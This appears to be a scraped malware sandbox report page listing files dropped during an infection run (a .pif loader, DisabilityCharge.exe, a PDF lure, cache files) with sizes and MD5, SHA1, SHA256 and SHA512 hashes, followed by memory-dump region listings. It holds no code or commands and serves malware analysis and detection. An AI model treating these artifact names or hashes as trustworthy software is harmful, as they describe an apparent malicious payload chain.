Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
64KB

MD5
827c47e299f124cd3464368b5491c038

SHA1
a52cb838b7412f428e5c3a5b95f476fc7a095079

SHA256
8560f1c759dbf52dc28530a840f682ca27c1c44e36537d46fa4303149dd1db55

SHA512
2f0a505ed78855a1470ef7f397a7b32c2e50cafc544b90c80d3fcad16ea05f5a64e1217f228c1f38a4f7f6407bb518c86557a04148b05abe721ec9f9996fa56c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pif
Filesize
872KB

MD5
6ee7ddebff0a2b78c7ac30f6e00d1d11

SHA1
f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2

SHA256
865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4

SHA512
57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\Cheers.pif
Filesize
103B

MD5
9fb8e634ff869eec8cb42ab7af0b6fb5

SHA1
d7553a9bb0e28264e33ae55fd9f472b4b64370ba

SHA256
610a3efda69516655dd03cfc7d26224b2efe35934521af69fd9e96421fe1f3df

SHA512
76edab533503200b549171988f355176ba80a3976dc1ed3c74578b1da858fefd50bdc9bdee0418d4fa4543f7630a7b78fce7da758217627f71b2bd15fc773422

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\5139075\M
Filesize
867KB

MD5
b18b385dc3c027bc4cd4362e23677edc

SHA1
65b09d44a81ca8528cf472f91e783a5199411f45

SHA256
c43b8b1a8b8ab1455009a1463c77166c87d21b5ded408a9b9d2eb91213e783de

SHA512
66889a43e26f37bd4ea756719c07e389c2292a2b971f7367c6779d63ba1de82f5509e62dbb5ab994b4d5e819614cb8a2051b21a7e7d5197e2067054314baa46e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Anatomy
Filesize
268KB

MD5
3d0fe94011bfc11f960f3692773becf6

SHA1
eda278f584c80b7a5ec1a48c16c1453fd79d30fe

SHA256
f1e2acd5399b8fd82a7d3be16aba6cf70dd4f5fea82211979b89e6293b736e85

SHA512
4f15232e5966d2c024e929de468a4ff427d5ec714b15c3a19c55ce6c03342f01a4dd9784672aa3a4ec738db9c926727fc0108d36d751f2669b27837470bce0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Cap
Filesize
152KB

MD5
d7b3e4a1f20444dd37b4ef305b6f8199

SHA1
bfd1d1bdff7c9d7e1ab6b46399252e94bbab8258

SHA256
b64c28e45770c23ba7b4cc1b80efd0edafaa0ad8109d3c9e340b45ae40565929

SHA512
24e83d25a23170f0d5c5f9f2afac13e72c017c98e443014e82a7b1b5a3a7aa9aafdfd795517e0a2b93bae2f742809c6a9e0627669c73dc3a8a0b57e9b2b8663a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Church
Filesize
113KB

MD5
b020ac666f105e582800755e46b87e54

SHA1
33c9afc7390f7fefe0b11ee2f9e32f8107d5ec21

SHA256
1713e9701d98f06a20391a048b2f5cb213b0ccf23f45df39df3cdbd55b23935c

SHA512
0d6c163717bef8e894cdf95b619ac1d7728bc1b88a2485606b1f2270d5c683caab7c4d693f467ec89d83a7ae34ca4e1afad1df3a7d25e8a7fc750826a89a59b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Cingular
Filesize
262KB

MD5
5b18970d8c464ca95ef183c6eddf2c79

SHA1
30f9ef49ce58ded149dd60a32359052c7fda6b25

SHA256
53a87d85121c6e590a928d3fae1f72ab3c266c980cc6a89f39cd74a2127d6b1e

SHA512
2f636bb7527a194467ce15046d9bf1368fca37a9b160c22aeb022a1c15a0c6cbf978373fb6d59ac692c9e7de37310c9fcc9f26c1c1d54ecace41f94ccc5fedbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Customs
Filesize
239KB

MD5
4c4ea6968e54f5f5c4c254587fee63dc

SHA1
d21927f93dfb1626405cf09f3379d6bc7dd8a505

SHA256
3a6b764666b1675287f39a952e072fcd41332b4d0ce2b4e59a96aa5a27af8707

SHA512
8b3f479dd3accfffe0235f2a3e102c306c288788d533ae78f9b8d8bbd95f36a4a613f6c1c1f2443566e17971c6116274b8b901b83608a6189e4d4927e47e42b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Dominican
Filesize
137KB

MD5
3c699f1767c677adfed1c113de6d184f

SHA1
ca15988fb3c81b6b4e0d7c5914e0bb2e07b35d1b

SHA256
740648b4a35012828dc95ef4258677d80659d820461ccfc9f98216facf0fea9a

SHA512
9ba925d63f2f9c0dbb244d6cea56d4bfd0b39de973e9c68c743ef6a1014c2a72b93072606af17bc770a837320c3cf8dc5f51976389cd599922c7b668d263c2af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Observed
Filesize
25KB

MD5
ad5b9509809e2c43efd8e4e0cbb697aa

SHA1
440d24a228fd1a0b125d535e55b887713b237f37

SHA256
eb882bf341c37bcd1c625e156f33db1b338d0e435aa074fa379cc3e73d6d9dad

SHA512
553bf92ac85b4b5ce9605fd0630e9f0396f282ece3f2cd4c0741cfd2b29acdb2246c7df749b0ae6d0d7cd3327f0fd34588ab205659f7cdd91a43e92b34dcd695

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Ons
Filesize
140B

MD5
61bab20dd66e4690943a6165fd4ff9ca

SHA1
01237b42f749d18c2529aa6233349ecc5de29db2

SHA256
4dab1074edd81fc8d7b5c1e989b025f96ff09ae42e58934668bcc2f696a167c9

SHA512
9419cde00c25107d5ea4dd683b43d437fb508b951f5d7fbe919169724218b8bb13f2e91b3068f7a31433c3b899e9ae26e18cf94f9a9468ac5624efaa8c8f2ed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Placing
Filesize
247KB

MD5
b68df1f6cc55a943bd8bd6a1ba4baeb2

SHA1
ed2f9c007bef6a9e8d52aba49704b56c9babea6d

SHA256
fdd8a7a40fdee48bd3a93b70e27c8efbb1aa860e2f7f587e1eecacbee3d6dd68

SHA512
0f622f1d33bcbe46483fa9f578eaa845e49c3617d6f0c76f46d2a32bf33e350a74bb44b4b0c43ddb25fa9f808de763d49f2af37072748b3f98010a8eb6ded273

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Software
Filesize
101KB

MD5
722238ba226d0e01df25a8d6e95d609f

SHA1
2f5e912ff0660bdc3f85ccf6d61bcb10fab8edef

SHA256
00559112065d90d8ba296b46949907ea4141c19323e999670a918bd50c5ae162

SHA512
3200e2063b157198c62a69fce4435d1c139c6e7b7f00e0a8e0d05fb0bf54fc886adeea0a2a4e4e8ec055ae0c94eabb1867e6d019920aade7ccef33e91e3be042

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Typing
Filesize
220KB

MD5
f0c0d7aff4f13ac8f3c247cb9fca2943

SHA1
94b642aa412319f2bfd814fefefa1b66c9fd7cc7

SHA256
2e933f3194ac2649b3f2c3f0289174b787ef71314143d63980b4d0c3ca698582

SHA512
36f1296f06acccfb3d621aaaf60ea24b354633568b0a946b2f2239e0e61f62dac2f6c418f1b9d2512572b308f176eeb657d479e1448bc330c63b9b01ae585b39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5voe0aqd.04a.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\DisabilityCharge.exe
Filesize
934KB

MD5
7def16e0ceea0ad69d53e0e636541dd9

SHA1
92080bb5ad272cf69f69aa0588856cda4b4b1c28

SHA256
35ed65d9919843300db648bf93ae57d7330095eb1ce18d6c6050db88a2e4f297

SHA512
9616fb69ed3fd6d59ae060a671c5af86f0d7e1a4e6f8436a9c7244928a2bb1f0a76ec4f1968f77180141493c16a4e1090faf8786ead929c3bd3812f2e09e596a

Download Submit
C:\Users\Admin\AppData\Roaming\SA160.pdf
Filesize
290KB

MD5
267489e084b08204ba4f32a865f2afec

SHA1
7c77753e748b3fc0a1e26687032bbbf575021d91

SHA256
449e7d4fef2f0a11f5ccc0698a36d05fbac682791ca6b3ffaafa4605533e6553

SHA512
9e0a516257a6491093d05b01bc7d654cacd1fff7be0024d7260e49b7a2edd6afe8a36d3f95815111e294916f0212c5236f1560e67355750da5c80fc7bfc1c6b6

Download Submit
memory/1392-107-0x000000000A0B0000-0x000000000A0D1000-memory.dmp

Filesize
132KB

Download
memory/1392-207-0x000000000B2D0000-0x000000000B57B000-memory.dmp

Filesize
2.7MB

Download
memory/1544-15-0x00007FFCD1C30000-0x00007FFCD26F1000-memory.dmp

Filesize
10.8MB

Download
memory/1544-11-0x000001D5B6DB0000-0x000001D5B6DC0000-memory.dmp

Filesize
64KB

Download
memory/1544-12-0x000001D5B6DB0000-0x000001D5B6DC0000-memory.dmp

Filesize
64KB

Download
memory/1544-9-0x000001D5D1460000-0x000001D5D1482000-memory.dmp

Filesize
136KB

Download
memory/1544-10-0x00007FFCD1C30000-0x00007FFCD26F1000-memory.dmp

Filesize
10.8MB

Download
memory/3644-231-0x00000000052A0000-0x000000000530D000-memory.dmp

Filesize
436KB

Download
memory/3644-239-0x00000000052A0000-0x000000000530D000-memory.dmp

Filesize
436KB

Download
memory/3644-255-0x00000000063B0000-0x00000000067B0000-memory.dmp

Filesize
4.0MB

Download
memory/3644-245-0x0000000076D20000-0x0000000076F35000-memory.dmp

Filesize
2.1MB

Download
memory/3644-242-0x00007FFCF0010000-0x00007FFCF0205000-memory.dmp

Filesize
2.0MB

Download
memory/3644-243-0x00000000063B0000-0x00000000067B0000-memory.dmp

Filesize
4.0MB

Download
memory/3644-223-0x0000000000D20000-0x0000000000D21000-memory.dmp

Filesize
4KB

Download
memory/3644-224-0x00000000052A0000-0x000000000530D000-memory.dmp

Filesize
436KB

Download
memory/3644-225-0x00000000052A0000-0x000000000530D000-memory.dmp

Filesize
436KB

Download
memory/3644-226-0x00000000052A0000-0x000000000530D000-memory.dmp

Filesize
436KB

Download
memory/3644-228-0x00000000052A0000-0x000000000530D000-memory.dmp

Filesize
436KB

Download
memory/3644-229-0x00000000052A0000-0x000000000530D000-memory.dmp

Filesize
436KB

Download
memory/3644-230-0x00000000052A0000-0x000000000530D000-memory.dmp

Filesize
436KB

Download
memory/3644-241-0x00000000063B0000-0x00000000067B0000-memory.dmp

Filesize
4.0MB

Download
memory/3644-238-0x00000000063B0000-0x00000000067B0000-memory.dmp

Filesize
4.0MB

Download
memory/3644-105-0x00000000777D1000-0x00000000778F1000-memory.dmp

Filesize
1.1MB

Download
memory/3644-240-0x00000000063B0000-0x00000000067B0000-memory.dmp

Filesize
4.0MB

Download
memory/4276-19-0x00007FFCD0BB0000-0x00007FFCD1671000-memory.dmp

Filesize
10.8MB

Download
memory/4276-20-0x0000015B37A30000-0x0000015B37A40000-memory.dmp

Filesize
64KB

Download
memory/4276-21-0x0000015B37A30000-0x0000015B37A40000-memory.dmp

Filesize
64KB

Download
memory/4276-43-0x0000015B37BB0000-0x0000015B37CFE000-memory.dmp

Filesize
1.3MB

Download
memory/4276-50-0x00007FFCD0BB0000-0x00007FFCD1671000-memory.dmp

Filesize
10.8MB

Download
memory/5116-246-0x00000000006E0000-0x00000000006E9000-memory.dmp

Filesize
36KB

Download
memory/5116-249-0x0000000002420000-0x0000000002820000-memory.dmp

Filesize
4.0MB

Download
memory/5116-248-0x0000000002420000-0x0000000002820000-memory.dmp

Filesize
4.0MB

Download
memory/5116-251-0x00007FFCF0010000-0x00007FFCF0205000-memory.dmp

Filesize
2.0MB

Download
memory/5116-254-0x0000000002420000-0x0000000002820000-memory.dmp

Filesize
4.0MB

Download
memory/5116-253-0x0000000076D20000-0x0000000076F35000-memory.dmp

Filesize
2.1MB

Download
memory/5116-256-0x0000000002420000-0x0000000002820000-memory.dmp

Filesize
4.0MB

Download